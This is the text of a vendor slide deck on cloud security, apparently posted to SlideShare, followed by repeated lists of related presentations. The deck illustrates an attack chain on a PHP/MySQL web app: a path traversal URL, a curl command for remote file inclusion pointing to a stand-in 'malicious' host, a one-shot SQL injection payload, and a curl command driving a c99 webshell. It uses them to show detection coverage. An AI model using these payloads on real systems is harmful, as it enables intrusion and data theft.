SlideShare une entreprise Scribd logo

Realities of Security in the Cloud

Alert Logic
Alert Logic

Realities of Security in the Cloud

Technologie
1  sur  20
Télécharger pour lire hors ligne
REALITIES OF SECURITY IN THE CLOUD Mark Brooks VP, Sales Engineering, Alert Logic
Security is a challenge.
Security Has Changed
• Security Monitoring • Log Analysis • Vulnerability Scanning • Network Threat Detection • Security Monitoring • Secure Coding and Best Practices • Software and Virtual Patching • Configuration Management • Access Management (including multi- factor authentication) • Access Management • Configuration Hardening • Patch Management • TLS/SSL Encryption • Network Security Configuration • Web Application Firewall • Vulnerability Scanning • Application level attack monitoring • Hypervisor Management • System Image Library • Root Access for Customers • Managed Patching (PaaS, not IaaS) • Logical Network Segmentation • Perimeter Security Services • External DDOS, spoofing, and scanning monitored APPS CUSTOMER ALERT LOGICMICROSOFT VIRTUAL MACHINES NETWORKING INFRASTRUCTURE SERVICES Security in the Cloud is a Shared Responsibility
Let’s talk about security coverage.
Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. Azure Services VMs, Storage Azure VMs Azure VMs VNET Traffic Manager Users Internet gateway Load Balancers DB instance DB instance AvailabilityzoneAAvailabilityzoneB VMScale Sets Web App Server VMScale Sets Storage Blob Azure VMs Azure VMs
An attack scenario - Recon VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach AuditLogs Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&COverall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see? AuditLogs
Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C AuditLogs Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection AuditLogs Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection AuditLogs Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT
Thank You.

Recommandé

Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web AttacksAlert Logic
 
Security Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureSecurity Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureAlert Logic
 
Stories from the Security Operations Center
Stories from the Security Operations CenterStories from the Security Operations Center
Stories from the Security Operations CenterAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Alert Logic
 
Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Alert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCAlert Logic
 

Recommandé

Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web AttacksAlert Logic
 
Security Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureSecurity Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureAlert Logic
 
Stories from the Security Operations Center
Stories from the Security Operations CenterStories from the Security Operations Center
Stories from the Security Operations CenterAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Alert Logic
 
Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Alert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCAlert Logic
 
Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack SurfaceAlert Logic
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudAlert Logic
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the CloudAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App AttacksAlert Logic
 
CSS17: Houston - Azure Shared Security Model Overview
CSS17: Houston - Azure Shared Security Model OverviewCSS17: Houston - Azure Shared Security Model Overview
CSS17: Houston - Azure Shared Security Model OverviewAlert Logic
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsAlert Logic
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSAlert Logic
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsAlert Logic
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alAlert Logic
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alAlert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack DemonstrationAlert Logic
 
Power of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityPower of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityBruno Capuano
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeFastly
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 

Contenu connexe

Tendances

Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack SurfaceAlert Logic
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudAlert Logic
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the CloudAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App AttacksAlert Logic
 
CSS17: Houston - Azure Shared Security Model Overview
CSS17: Houston - Azure Shared Security Model OverviewCSS17: Houston - Azure Shared Security Model Overview
CSS17: Houston - Azure Shared Security Model OverviewAlert Logic
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsAlert Logic
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSAlert Logic
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsAlert Logic
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alAlert Logic
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alAlert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack DemonstrationAlert Logic
 
Power of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityPower of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityBruno Capuano
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 

Tendances (20)

Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack Surface
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the Cloud
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the Cloud
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App Attacks
 
CSS17: Houston - Azure Shared Security Model Overview
CSS17: Houston - Azure Shared Security Model OverviewCSS17: Houston - Azure Shared Security Model Overview
CSS17: Houston - Azure Shared Security Model Overview
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWS
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS Applications
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations Center
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration
 
Power of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure securityPower of the cloud - Introduction to azure security
Power of the cloud - Introduction to azure security
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 

Similaire à Realities of Security in the Cloud

Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeFastly
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationDerrick Hunter
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceCortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceMSAdvAnalytics
 
Port of seattle security presentation david morris
Port of seattle security presentation david morrisPort of seattle security presentation david morris
Port of seattle security presentation david morrisEmily2014
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself Alert Logic
 
Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers Jeff Suratt
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaShivamSharma909
 

Similaire à Realities of Security in the Cloud (20)

Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Web Security
Web SecurityWeb Security
Web Security
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
 
Attques web
Attques webAttques web
Attques web
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceCortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
 
Port of seattle security presentation david morris
Port of seattle security presentation david morrisPort of seattle security presentation david morris
Port of seattle security presentation david morris
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
 
Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers Apache struts vulnerabilities compromise corporate web servers 
Apache struts vulnerabilities compromise corporate web servers 
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agenda
 

Plus de Alert Logic

Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and ResponseAlert Logic
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: PresidioAlert Logic
 
Security Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterSecurity Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: PresidioAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
The Intersection of Security and DevOps
The Intersection of Security and DevOpsThe Intersection of Security and DevOps
The Intersection of Security and DevOpsAlert Logic
 
Security Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanySecurity Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanyAlert Logic
 
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionReducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionAlert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Microsoft Azure Security Overview - Microsoft - CSS Dallas Azure
